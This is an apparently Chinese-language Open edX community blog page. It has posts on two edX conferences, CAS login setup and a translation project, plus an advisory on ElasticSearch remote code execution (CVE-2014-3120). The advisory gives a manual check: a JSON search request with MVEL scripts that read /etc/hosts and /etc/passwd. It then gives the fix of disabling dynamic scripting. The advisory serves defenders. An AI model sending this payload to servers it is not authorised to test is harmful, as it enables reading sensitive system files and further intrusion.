Open edX Conference与EDX GLOBAL FORUM

openedxcon

本月有两个edX方面的会议召开。

Open edX Conference

http://con.openedx.org/

第一届Open edX Conference为期两天,11月28-29在哈佛大学举行。这个会议主要是面向Open edX的开发以及使用,参会人员为开发者、系统管理员、教育专员以及其他想了解和使用Open edX的人员。也就是说,这个会议更关注于平台技术及使用,大家交流自己开发进展、使用心得等等。

IMG_0987

会议的资料和视频在 https://openedx.atlassian.net/wiki/display/OPEN/Open+edX+Conference+Presentations。我们将很快转存到国内。

EDX GLOBAL FORUM

http://futureedu.edx.org/

第四届EDX GLOBAL FORUM于11月19-21在波士顿大学举办。很明显这是Open edX Conference的延续,参会人员完全可以步行从哈佛到达波士顿。这个会议的参与者是edX的各个会员组织, 教育者、思想领袖、教学技术专家、研究者、梦想家和创新者在这里分享教学研究和混合式学习经验,并探讨网络教育的新趋势。通过论坛edX社区成员将有机会合作,在全球范围内塑造教育的未来。

 

 

Open edX 配置 CAS 登陆

转载自:[记录] Open edX 配置 CAS 登陆

Open edX 目前支持CAS、SSL Client Certificates、Shibboleth三种认证扩展以及多种社会化登录(博客先前有过介绍),
默认支持列表可以参照官方WIki

CAS干嘛用的,看官比我清楚,没我清楚的请立即谷歌,故下面直接操作:

1.环境:

ubuntu 12.04
edx-devstack

1 sudo su edxapp

2.更换django-cas

Continue reading

Open edX文档翻译计划

针对目前edX相关中文文档匮乏的情况,我们将开始一个新的文档翻译计划,征集更多人手参与。如果您的学校有学生或者研究生想参与这个计划的,也可以在QQ群里面联系我们。最终文档成果中将列出每个贡献者。

Open edX 用户注意防范ElasticSearch远程任意代码执行漏洞

转载自:[记录] Open edX 用户注意防范ElasticSearch远程任意代码执行漏洞

请各位edx用户 注意CVE: CVE-2014-3120
edx官方虽然意识到了这个漏洞 (configuration),并且尝试修复了 但是只在集群安装时(configuration)才会用到他们的防御代码,所以如果各位使用官方wiki 安装的将依然会是含有漏洞的版本

原理

这个漏洞实际上非常简单,ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。

ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。

而在ElasticSearch里,默认配置是打开动态脚本功能的,因此用户可以直接通过http请求,执行任意代码。

检测方法

在线检测:

http://tool.scanv.com/es.html 可以检测任意地址
http://bouk.co/blog/elasticsearch-rce/poc.html 只检测localhost,不过会输出/etc/hosts和/etc/passwd文件的内容到网页上

自己手动检测:

2 {
3   "size": 1,
4   "query": {
5     "filtered": {
6       "query": {
7         "match_all": {}
8       }
9     }
10   },
11   "script_fields": {
12     "/etc/hosts": {
13       "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();"
14     },
15     "/etc/passwd": {
16       "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();"
17     }
18   }
19 }
20 '

处理办法

关掉执行脚本功能,在配置文件elasticsearch.yml里为每一个结点都加上:

1 script.disable_dynamic: true

参见:

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts

官方会在1.2版本默认关闭动态脚本

参见:

https://github.com/elasticsearch/elasticsearch/issues/5853

参考:

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/search-request-script-fields.html

http://bouk.co/blog/elasticsearch-rce/